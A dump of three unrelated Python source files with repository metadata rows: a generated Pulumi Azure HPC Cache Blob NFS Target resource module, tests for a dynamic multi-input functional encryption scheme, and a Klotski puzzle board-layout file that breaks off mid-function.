pulumi.set(__self__, "usage_model", usage_model)
if access_policy_name is not None:
pulumi.set(__self__, "access_policy_name", access_policy_name)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="cacheName")
def cache_name(self) -> pulumi.Input[str]:
"""
The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "cache_name")
@cache_name.setter
def cache_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cache_name", value)
@property
@pulumi.getter(name="namespacePath")
def namespace_path(self) -> pulumi.Input[str]:
"""
The client-facing file path of the HPC Cache Blob NFS Target.
"""
return pulumi.get(self, "namespace_path")
@namespace_path.setter
def namespace_path(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@property
@pulumi.getter(name="usageModel")
def usage_model(self) -> pulumi.Input[str]:
"""
The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
return pulumi.get(self, "usage_model")
@usage_model.setter
def usage_model(self, value: pulumi.Input[str]):
pulumi.set(self, "usage_model", value)
@property
@pulumi.getter(name="accessPolicyName")
def access_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the access policy applied to this target. Defaults to `default`.
"""
return pulumi.get(self, "access_policy_name")
@access_policy_name.setter
def access_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_policy_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _CacheBlobNfsTargetState:
def __init__(__self__, *,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CacheBlobNfsTarget resources.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
if access_policy_name is not None:
pulumi.set(__self__, "access_policy_name", access_policy_name)
if cache_name is not None:
pulumi.set(__self__, "cache_name", cache_name)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace_path is not None:
pulumi.set(__self__, "namespace_path", namespace_path)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if storage_container_id is not None:
pulumi.set(__self__, "storage_container_id", storage_container_id)
if usage_model is not None:
pulumi.set(__self__, "usage_model", usage_model)
@property
@pulumi.getter(name="accessPolicyName")
def access_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the access policy applied to this target. Defaults to `default`.
"""
return pulumi.get(self, "access_policy_name")
@access_policy_name.setter
def access_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_policy_name", value)
@property
@pulumi.getter(name="cacheName")
def cache_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "cache_name")
@cache_name.setter
def cache_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namespacePath")
def namespace_path(self) -> Optional[pulumi.Input[str]]:
"""
The client-facing file path of the HPC Cache Blob NFS Target.
"""
return pulumi.get(self, "namespace_path")
@namespace_path.setter
def namespace_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> Optional[pulumi.Input[str]]:
"""
The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_container_id", value)
@property
@pulumi.getter(name="usageModel")
def usage_model(self) -> Optional[pulumi.Input[str]]:
"""
The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
return pulumi.get(self, "usage_model")
@usage_model.setter
def usage_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "usage_model", value)
class CacheBlobNfsTarget(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Blob NFSv3 Target within a HPC Cache.
> **NOTE:**: By request of the service team the provider no longer automatically registering the `Microsoft.StorageCache` Resource Provider for this resource. To register it you can run `az provider register --namespace 'Microsoft.StorageCache'`.
> **NOTE:**: This resource depends on the NFSv3 enabled Storage Account, which has some prerequisites need to meet. Please checkout: https://docs.microsoft.com/en-us/azure/storage/blobs/network-file-system-protocol-support-how-to?tabs=azure-powershell.
## Import
HPC Cache Blob NFS Targets can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:hpc/cacheBlobNfsTarget:CacheBlobNfsTarget example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StorageCache/caches/cache1/storageTargets/target1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CacheBlobNfsTargetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Blob NFSv3 Target within a HPC Cache.
> **NOTE:**: By request of the service team the provider no longer automatically registering the `Microsoft.StorageCache` Resource Provider for this resource. To register it you can run `az provider register --namespace 'Microsoft.StorageCache'`.
> **NOTE:**: This resource depends on the NFSv3 enabled Storage Account, which has some prerequisites need to meet. Please checkout: https://docs.microsoft.com/en-us/azure/storage/blobs/network-file-system-protocol-support-how-to?tabs=azure-powershell.
## Import
HPC Cache Blob NFS Targets can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:hpc/cacheBlobNfsTarget:CacheBlobNfsTarget example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StorageCache/caches/cache1/storageTargets/target1
```
:param str resource_name: The name of the resource.
:param CacheBlobNfsTargetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CacheBlobNfsTargetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CacheBlobNfsTargetArgs.__new__(CacheBlobNfsTargetArgs)
__props__.__dict__["access_policy_name"] = access_policy_name
if cache_name is None and not opts.urn:
raise TypeError("Missing required property 'cache_name'")
__props__.__dict__["cache_name"] = cache_name
__props__.__dict__["name"] = name
if namespace_path is None and not opts.urn:
raise TypeError("Missing required property 'namespace_path'")
__props__.__dict__["namespace_path"] = namespace_path
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if storage_container_id is None and not opts.urn:
raise TypeError("Missing required property 'storage_container_id'")
__props__.__dict__["storage_container_id"] = storage_container_id
if usage_model is None and not opts.urn:
raise TypeError("Missing required property 'usage_model'")
__props__.__dict__["usage_model"] = usage_model
super(CacheBlobNfsTarget, __self__).__init__(
'azure:hpc/cacheBlobNfsTarget:CacheBlobNfsTarget',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None) -> 'CacheBlobNfsTarget':
"""
Get an existing CacheBlobNfsTarget resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CacheBlobNfsTargetState.__new__(_CacheBlobNfsTargetState)
__props__.__dict__["access_policy_name"] = access_policy_name
__props__.__dict__["cache_name"] = cache_name
__props__.__dict__["name"] = name
__props__.__dict__["namespace_path"] = namespace_path
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["storage_container_id"] = storage_container_id
__props__.__dict__["usage_model"] = usage_model
return CacheBlobNfsTarget(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accessPolicyName")
def access_policy_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the access policy applied to this target. Defaults to `default`.
"""
return pulumi.get(self, "access_policy_name")
@property
@pulumi.getter(name="cacheName")
def cache_name(self) -> pulumi.Output[str]:
"""
The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "cache_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="namespacePath")
def namespace_path(self) -> pulumi.Output[str]:
"""
The client-facing file path of the HPC Cache Blob NFS Target.
"""
return pulumi.get(self, "namespace_path")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Output[str]:
"""
The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@property
@pulumi.getter(name="usageModel")
def usage_model(self) -> pulumi.Output[str]:
"""
The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
return pulumi.get(self, "usage_model")
| 53.832244 | 283 | 0.683799 | 3,246 | 24,709 | 4.986137 | 0.071781 | 0.064566 | 0.080445 | 0.060241 | 0.891566 | 0.876058 | 0.85882 | 0.840964 | 0.82768 | 0.805993 | 0 | 0.007223 | 0.226759 | 24,709 | 458 | 284 | 53.949782 | 0.839893 | 0.425068 | 0 | 0.664151 | 1 | 0 | 0.120415 | 0.008487 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158491 | false | 0.003774 | 0.018868 | 0 | 0.271698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
39fb63ce9cb545bdfba644f410339ac244125cf5 | 7,263 | py | Python | test/crypto/test_mife_dynamic.py | eggry/nn-emd | 5488e3b0de904415e27c9e9e9af3e1e3c8923025 | [
"MIT"
] | null | null | null | test/crypto/test_mife_dynamic.py | eggry/nn-emd | 5488e3b0de904415e27c9e9e9af3e1e3c8923025 | [
"MIT"
] | null | null | null | test/crypto/test_mife_dynamic.py | eggry/nn-emd | 5488e3b0de904415e27c9e9e9af3e1e3c8923025 | [
"MIT"
] | null | null | null | import random
import logging
import numpy as np
from nn.utils import timer
from crypto.mife_dynamic import MIFEDynamic
from crypto.mife_dynamic import MIFEDynamicTPA
from crypto.mife_dynamic import MIFEDynamicClient
from crypto.utils import load_dlog_table_config
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
sec_param_config_file = 'config/sec_param.json'
dlog_table_config_file = 'config/dlog_b8.json'
def test_mife_basic():
logger.info("testing the correctness of basic mife.")
parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(parties[idx])]
x_vec_count = x_vec_count + parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
mife = MIFEDynamic(sec_param=256, parties=parties)
mife.setup()
ct = dict()
ct['parties'] = parties
ct['ct_dict'] = dict()
for idx in parties.keys():
pk = mife.generate_public_key(idx)
ct['ct_dict'][idx] = mife.encrypt(pk, x_dict[idx])
common_pk = mife.generate_common_public_key()
sk = mife.generate_private_key(y_vec, parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod)
def test_mife_basic_with_config():
logger.info("testing the correctness of mife using config file.")
parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(parties[idx])]
x_vec_count = x_vec_count + parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
logger.info('loading dlog configuration ...')
with timer('load dlog config, cost time:', logger) as t:
dlog = load_dlog_table_config(dlog_table_config_file)
logger.info('load dlog configuration DONE')
mife = MIFEDynamic(sec_param=256, parties=parties,
sec_param_config=sec_param_config_file, dlog=dlog)
mife.setup()
ct = dict()
ct['parties'] = parties
ct['ct_dict'] = dict()
for idx in parties.keys():
pk = mife.generate_public_key(idx)
ct['ct_dict'][idx] = mife.encrypt(pk, x_dict[idx])
common_pk = mife.generate_common_public_key()
sk = mife.generate_private_key(y_vec, parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod)
def test_mife_dynamic():
logger.info('test dynamic mife ...')
setup_parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4,
'idx-4': 4,
'idx-5': 1,
'idx-6': 2
}
logger.info('loading dlog configuration ...')
with timer('load dlog config, cost time:', logger) as t:
dlog = load_dlog_table_config(dlog_table_config_file)
logger.info('load dlog configuration DONE')
mife = MIFEDynamic(sec_param=256, parties=setup_parties,
sec_param_config=sec_param_config_file, dlog=dlog)
mife.setup()
enrolled_parties = {
'idx-2': 3,
'idx-3': 4,
'idx-5': 1
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in enrolled_parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(enrolled_parties[idx])]
x_vec_count = x_vec_count + enrolled_parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
ct = dict()
ct['parties'] = enrolled_parties
ct['ct_dict'] = dict()
for idx in enrolled_parties.keys():
pk = mife.generate_public_key(idx)
ct['ct_dict'][idx] = mife.encrypt(pk, x_dict[idx])
common_pk = mife.generate_common_public_key()
sk = mife.generate_private_key(y_vec, enrolled_parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod)
def test_mife_dynamic_separate():
logger.info('test dynamic mife in separate roles ...')
setup_parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4,
'idx-4': 4,
'idx-5': 1,
'idx-6': 2
}
logger.info('loading dlog configuration ...')
with timer('load dlog config, cost time:', logger) as t:
dlog = load_dlog_table_config(dlog_table_config_file)
logger.info('load dlog configuration DONE')
mife_tpa = MIFEDynamicTPA(sec_param=256, parties=setup_parties, sec_param_config=sec_param_config_file)
mife_tpa.setup()
mife_enc_client = MIFEDynamicClient(sec_param=256, role='enc')
mife_dec_client = MIFEDynamicClient(sec_param=256, role='dec', dlog=dlog)
enrolled_parties = {
'idx-2': 3,
'idx-3': 4,
'idx-5': 1
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in enrolled_parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(enrolled_parties[idx])]
x_vec_count = x_vec_count + enrolled_parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
ct = dict()
ct['parties'] = enrolled_parties
ct['ct_dict'] = dict()
for idx in enrolled_parties.keys():
pk = mife_tpa.generate_public_key(idx)
ct['ct_dict'][idx] = mife_enc_client.encrypt(pk, x_dict[idx])
common_pk = mife_tpa.generate_common_public_key()
sk = mife_tpa.generate_private_key(y_vec, enrolled_parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife_dec_client.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod) | 34.751196 | 107 | 0.642159 | 1,106 | 7,263 | 3.964738 | 0.097649 | 0.032839 | 0.032839 | 0.031015 | 0.899202 | 0.869327 | 0.830331 | 0.821209 | 0.814595 | 0.806613 | 0 | 0.021159 | 0.225664 | 7,263 | 209 | 108 | 34.751196 | 0.758535 | 0.011979 | 0 | 0.778409 | 0 | 0 | 0.143335 | 0.002928 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0 | 0.045455 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2626ee40586b5e126d259ac555dd4e14457771e3 | 7,516 | py | Python | games.py | Hankl227/Klotski | 1e6f65e7b82c77d58a97a4a08dc475e199f9841e | [
"Apache-2.0"
] | null | null | null | games.py | Hankl227/Klotski | 1e6f65e7b82c77d58a97a4a08dc475e199f9841e | [
"Apache-2.0"
] | 7 | 2020-09-14T20:33:28.000Z | 2020-10-23T23:43:18.000Z | games.py | Hankl227/Klotski | 1e6f65e7b82c77d58a97a4a08dc475e199f9841e | [
"Apache-2.0"
] | 1 | 2020-11-24T03:12:23.000Z | 2020-11-24T03:12:23.000Z | # Author: Shway Wang
# Date: 2020, September 15th
# Location: China Ningxia Yinchuan
from util import *
# 逃之夭夭:
def TZYY():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([3, 0], VER, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([0, 2], VER, 'm')
huangZhong = Jiang([3, 2], VER, 'h')
zhangFei = Jiang([0, 0], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([1, 1])
b2 = Bing([2, 1])
b3 = Bing([0, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 无横之局:
def WHZJ():
# caoCao:
caoCao = CaoCao([0, 2])
# Jiangs:
zhaoYun = Jiang([2, 1], VER, 'y')
guanYu = Jiang([2, 3], VER, 'g')
maChao = Jiang([1, 0], VER, 'm')
huangZhong = Jiang([0, 0], VER, 'h')
zhangFei = Jiang([3, 1], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([2, 0])
b2 = Bing([3, 0])
b3 = Bing([0, 4])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 将当后路:
def JDHL():
# caoCao:
caoCao = CaoCao([2, 0])
# Jiangs:
zhaoYun = Jiang([0, 2], HOR, 'y')
guanYu = Jiang([0, 0], HOR, 'g')
maChao = Jiang([0, 3], HOR, 'm')
huangZhong = Jiang([2, 2], HOR, 'h')
zhangFei = Jiang([0, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 4])
b2 = Bing([1, 4])
b3 = Bing([2, 3])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 前呼后拥:
def QHHY():
# caoCao:
caoCao = CaoCao([2, 0])
# Jiangs:
zhaoYun = Jiang([2, 2], HOR, 'y')
guanYu = Jiang([0, 1], HOR, 'g')
maChao = Jiang([0, 3], HOR, 'm')
huangZhong = Jiang([2, 3], HOR, 'h')
zhangFei = Jiang([0, 2], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([1, 0])
b3 = Bing([2, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 比翼横空:
def BYHK():
# caoCao:
caoCao = CaoCao([2, 0])
# Jiangs:
zhaoYun = Jiang([0, 2], HOR, 'y')
guanYu = Jiang([0, 0], HOR, 'g')
maChao = Jiang([2, 2], HOR, 'm')
huangZhong = Jiang([3, 3], VER, 'h')
zhangFei = Jiang([0, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 3])
b2 = Bing([0, 4])
b3 = Bing([2, 3])
b4 = Bing([2, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 巧过五关:
def QGWG():
# caoCao:
caoCao = CaoCao([1, 0])
# Jiangs:
zhaoYun = Jiang([0, 3], HOR, 'y')
guanYu = Jiang([0, 2], HOR, 'g')
maChao = Jiang([2, 3], HOR, 'm')
huangZhong = Jiang([1, 4], HOR, 'h')
zhangFei = Jiang([2, 2], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([0, 1])
b3 = Bing([3, 0])
b4 = Bing([3, 1])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 五将逼宫:
def WJBG():
# caoCao:
caoCao = CaoCao([1, 1])
# Jiangs:
